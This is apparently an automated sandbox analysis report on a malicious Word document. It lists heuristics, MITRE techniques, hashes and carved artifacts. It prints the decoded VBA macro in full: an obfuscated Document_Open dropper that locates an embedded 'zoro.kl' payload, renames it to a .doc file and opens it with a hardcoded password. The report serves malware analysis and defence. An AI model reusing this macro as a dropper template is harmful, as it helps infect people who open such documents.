MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that executes upon opening the document, indicated by the 'Document_Open' subroutine. This macro appears to be designed to download and execute a second-stage payload, as suggested by the logic involving file paths and the opening of a password-protected document. The password 'doyouknowthatthegodsofdeathonlyeatapples?' is used to decrypt the embedded payload, and the macro attempts to establish persistence by writing to the Run key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy'.
Heuristics 9
-
Office EPRINT stream contains EMF object high OLE_EPRINT_EMF_OBJECTOLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYThis finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. OLE file is 561,557 bytes but its declared streams total only 246,437 bytes — 315,120 bytes (56%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOADThis finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Office document is password-encrypted medium OFFICE_ENCRYPTED_PACKAGEThis finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. OLE container holds MS-OFFCRYPTO encrypted package (Agile Encryption (Office 2010+)).
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/2006/encryption In document text (OLE body)
- http://schemas.microsoft.com/office/2006/keyEncryptor/passwordIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/keyEncryptor/certificateIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 6
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3562 bytes |
SHA-256: 2064db1d71e39f55f94251536de7d2372c96320ce9c79c01697ef6e8c7be7018 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
Dim lds As String
Dim vssfs As String
Private Sub Document_Open()
Dim dfgdgdg
Call s1("L")
Dim fds, fdsa As String
fds = "\"
fdsa = ".d"
Call s2("ocal/")
Call ass
Call acc
Dim kytrewwf As String
kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath)
fds = kytrewwf & fds
If Dir(fds & "zoro" & fdsa & vssfs) = "" Then
Dim mySum
mySum = Application.Run("ppl")
If Len(lds) > 2 Then
Call nam(lds, kytrewwf)
Call pppx(fds & "zoro" & fdsa & vssfs)
End If
End If
End Sub
Sub plof(kl As String)
lds = kl
End Sub
Sub ass()
vssfs = "o"
End Sub
Sub acc()
vssfs = vssfs & "c"
End Sub
Sub hdhdd(asda As String)
Dim MyFSO As FileSystemObject
Dim MyFile As File
Dim SourceFolder As String
Dim DestinationFolder As String
Dim MyFolder As Folder
Dim MySubFolder As Folder
Set MyFSO = New Scripting.FileSystemObject
Call Search(MyFSO.GetFolder(asda), lds)
End Sub
Attribute VB_Name = "Module1"
Dim vcxz
Sub pppx(pili As String)
Call oicx(pili)
Documents.Open FileName:=vcxz, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:="doyouknowthatthegodsofdeathonlyeatapples?", _
PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:=""
End Sub
Sub oicx(iii As String)
vcxz = iii
End Sub
Attribute VB_Name = "Module3"
Sub bvxfcsd(tini As String)
Selection.MoveDown Unit:=wdLine, Count:=3
Selection.MoveRight Unit:=wdCharacter, Count:=2
Selection.MoveDown Unit:=wdLine, Count:=3
Selection.MoveRight Unit:=wdCharacter, Count:=2
Selection.TypeBackspace
Selection.Copy
Dim uuuuc
uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)
ntgs = 50
sda = 49
While sda < 50
ntgs = ntgs - 1
If Dir(Left(uuuuc, ntgs) & tini, vbDirectory) = "" Then
Else
sda = 61
End If
Wend
Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & tini)
End Sub
Attribute VB_Name = "Module123345"
Dim pls As String
Sub Search(mds As Object, pafs As String)
Dim Nedc As Object
Dim Ters As Object
For Each Nedc In mds.SubFolders
Search Nedc, pafs
Next Nedc
For Each Ters In mds.Files
If Ters.Name = "zoro.kl" Then
pafs = Ters
End If
Next Ters
Exit Sub
ErrHandle:
Err.Clear
End Sub
Sub nam(pafs As String, aaaa As String)
Call ousx(aaaa)
Dim oxl
oxl = "\zoro.d"
oxl = oxl & "o"
oxl = oxl & "c"
Name pafs As pls & oxl
End Sub
Sub uoia(fffs As String)
pls = fffs
End Sub
Sub ousx(aaaa As String)
Call uoia(aaaa)
End Sub
Attribute VB_Name = "Module2"
Dim mgf, uhjknb, wers, qweds, fafaa As String
Dim ocm As String
Sub s1(vi As String)
mgf = vi
End Sub
Sub s2(vi As String)
uhjknb = vi
End Sub
Sub s3(vi As String)
wers = vi
End Sub
Sub ppl()
Dim mfd As String
mfd = "e"
wers = "T"
Dim poidds As String
Dim ugfc As String
ugfc = "p"
qweds = "m"
poidds = mgf & uhjknb & "" & wers & mfd & qweds & ugfc
Call bvxfcsd(poidds)
End Sub
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_1694992545/Ole10Native | 252707 bytes |
SHA-256: d6ea8d88262bd94b2bca58d8f73c5c5faac519adcac774c5dfe0bd0411e389bc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.
|
|||
ole10native_00_zoro.kl |
ole-package-payload | OLE Ole10Native payload: ObjectPool/_1694992545/Ole10Native; display_name=zoro.kl; full_path=C:\Users\kell\AppData\Local\Temp\zoro.kl; temp_path=; def_file= | 252416 bytes |
SHA-256: 88a8612327c5152fb4d0989c8ef69164f68d1147882e71a59fbc5ae93de37de4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.
|
|||
ole10native_01.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_1694996405/Ole10Native | 252707 bytes |
SHA-256: 1c306409f708b79114b62ad62fb8659b9188de15a0c64e70b55fcc7919b3eb1e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.
|
|||
ole10native_01_zoro.kl |
ole-package-payload | OLE Ole10Native payload: ObjectPool/_1694996405/Ole10Native; display_name=zoro.kl; full_path=C:\Users\kell\AppData\Local\Temp\zoro.kl; temp_path=; def_file= | 252416 bytes |
SHA-256: d75bc014475e80f11014da249e18698765aa5a19227315f34d85d7f6daf41249 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.
|
|||
embedded_office_off0008e86b.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x8E86B | 561557 bytes |
SHA-256: 8e93b928be16468b2adbf688d722d07ac962202688ddaedca29eb961ef272f2a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.93, consistent with packed or encrypted content.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.